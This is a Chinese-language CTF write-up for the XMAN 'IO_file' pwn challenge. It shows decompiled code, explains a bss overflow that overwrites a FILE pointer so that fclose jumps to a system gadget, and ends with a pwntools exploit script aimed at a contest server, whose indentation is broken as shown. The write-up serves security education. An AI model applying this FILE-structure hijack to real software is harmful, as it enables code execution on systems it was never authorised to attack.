##xman-個人排位賽

###pwn-chanllege1-IO_file

連結:https://pan.baidu.com/s/1vSrgF4iQ-2X6gQSciEPi9Q 密碼:g2hc
#####這是一道簡單的io_file的題，通過這個題大概可以知道io_file的機制，總的來說其實就是控制fd指標導致最後指標指向我們需要控制的函式
######先拖入ida：
    __int64 __fastcall main(__int64 a1, char **a2, char **a3)
       {
        int v4; // [rsp+Ch] [rbp-4h]

        stream = fopen("test.txt", "r");
        sub_400950("test.txt", "r");
        while ( 1 )
      {
         while ( 1 )
      {
      putchar(62);
      v4 = sub_4008AF(62LL);
      if ( v4 != 1 )
        break;
      sub_400908();
       }
      if ( v4 != 2 )
         break;
      sub_400920();
       }
        if ( v4 == 3 )
        sub_400933();
         return 0LL;
     }
######這是大概的程式碼：
      函式sub_4008AF：是用來進行輸入的一個函式，輸入大概有3種  
      1，2，3
      函式sub_400908：是用來get，s這個變數的函式，這個變數很關
      鍵因為他在bss段上且在fd指標之上
      函式sub_400920:是用來puts，s這個變數的函式，這個並不是很 
      關鍵的函式
      函式sub_400933:是一個fclose的一個函式，是一個我們可以發
      現漏洞的地方
      這就是大概函式的意思！！
######從這個函式的引發出瞭解題思路：
      首先s可以溢位，溢位之後覆蓋了fd指標然後再執行fclose進行對
      fd指標的呼叫然後構造system函式
######程式碼：
     #!/usr/bin/env python
     # -*- coding: utf-8 -*-
     from pwn import *

    binary = './task_challenge1'
    elf = ELF(binary)
    libc = elf.libc
    #io = process(binary)
    io = remote('202.112.51.184',30003)
    context.log_level = 'debug'
    context.arch = elf.arch
    #context.terminal = ['tmux', 'splitw', '-h']
    
    myu64 = lambda x: u64(x.ljust(8, '\0'))
    ub_offset = 0x3c4b30
    io.recvuntil('>')
    io.sendline('1')
    #gdb.attach(io, 'b _IO_new_fclose')
    buf_addr = 0x6010C0
    system = 0x400897
    pay = ((('\0'*0x10+p64(system)+'\0'*70).ljust(0x88,'\0') +\
      p64(buf_addr)).ljust(0xd8,'\0')+\
      p64(buf_addr)).ljust(0x100,'\0')+\
      p64(buf_addr)
      io.sendline(pay)
      io.recvuntil('>')
    io.sendline('3')

  io.interactive()